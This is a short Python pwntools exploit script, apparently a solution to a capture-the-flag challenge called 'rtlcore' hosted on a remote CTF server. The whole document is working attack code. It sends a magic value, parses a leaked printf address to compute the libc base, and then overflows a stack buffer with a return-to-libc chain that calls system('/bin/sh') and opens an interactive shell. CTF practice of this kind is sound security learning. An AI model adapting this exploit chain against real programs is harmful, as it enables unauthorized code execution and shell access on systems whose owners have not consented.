Exploit Code

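from pwn import *

# p = process('./rtlcore')               # local testing
p = remote('ctf.j0n9hyun.xyz', 3015)

libc = ELF('./libc.so.6')
# libc = ELF('/lib/i386-linux-gnu/libc.so.6')   # local libc
printf_offset = libc.symbols['printf']
system_offset = libc.symbols['system']
# ELF.search() returns a generator; use next() (the .next() method is Python 2 only)
binsh_offset = next(libc.search(b'/bin/sh'))

pause()  # gives time to attach a debugger before sending input

# First input: 0xc0d9b0a7 in little-endian followed by 16 null bytes (20 bytes total)
payload = b'\xa7\xb0\xd9\xc0' + b'\x00' * 16
p.sendlineafter(b': ', payload)

# The program prints an address after "0x"; the script treats it as the runtime address of printf
p.recvuntil(b'0x')
printf = int(p.recvn(8), 16)
libc_base = printf - printf_offset
system = libc_base + system_offset
binsh = libc_base + binsh_offset
log.info('libc_base : ' + hex(libc_base))

# Second input: 0x3e + 4 bytes of padding up to the saved return address,
# then system(), a 4-byte dummy return address, and the pointer to "/bin/sh" as its argument
payload = b'A' * (0x3e + 4) + p32(system) + b'A' * 4 + p32(binsh)
p.sendlineafter(b'\n', payload)
p.interactive()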
